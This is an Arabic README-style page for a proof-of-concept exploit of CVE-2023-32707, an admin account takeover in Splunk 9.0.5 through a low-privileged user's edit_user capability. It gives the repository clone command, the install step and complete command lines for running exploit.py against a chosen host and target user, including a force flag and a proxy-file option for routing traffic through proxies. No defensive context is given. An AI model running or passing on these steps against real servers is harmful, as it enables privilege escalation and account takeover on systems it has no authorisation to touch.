
استغلال POC محسّن استناداً إلى CVE المبلغ عنه على exploitdb
استغلال POC محسّن يعتمد على CVE المبلغ عنها على exploitdb
عنوان الاستغلال: Splunk 9.0.5 - السيطرة على حساب المسؤول CVE: CVE-2023-32707
يسمح هذا السكريبت باستغلال ثغرة أمنية في Splunk 9.0.5، مما يؤدي إلى السيطرة على حساب المسؤول. يستغل هذا الاستغلال مستخدمًا ذا صلاحيات منخفضة لديه إمكانية edit_user لتصعيد الصلاحيات.
pip3 install -r requirements.txt):
استنساخ المستودع:
git clone https://github.com/9xN/CVE-2023-32707.git
cd CVE-2023-32707
تشغيل السكريبت بالمعاملات المطلوبة:
python3 exploit.py --host <splunk_host> --username <splunk_username> --password <splunk_password> --target-user <target_user> --force-exploit
استبدل <splunk_host> و <splunk_username> و <splunk_password> و <target_user> بتفاصيل خادم Splunk الخاص بك.
--host: مضيف Splunk أو عنوان IP (مطلوب)--username: اسم مستخدم Splunk (مطلوب)--password: كلمة مرور Splunk (مطلوبة)--target-user: المستخدم المستهدف للسيطرة على الحساب (مطلوب)--force-exploit: فرض الاستغلال (اختياري)--proxy-file: ملف يحتوي على إعدادات الوكيل (اختياري)لاستخدام الوكلاء، حدد --proxy-file مع المسار إلى ملف يحتوي على إعدادات الوكيل.
مثال:
python3 exploit.py --host <splunk_host> --username <splunk_username> --password <splunk_password> --target-user <target_user> --force-exploit --proxy-file proxies.txt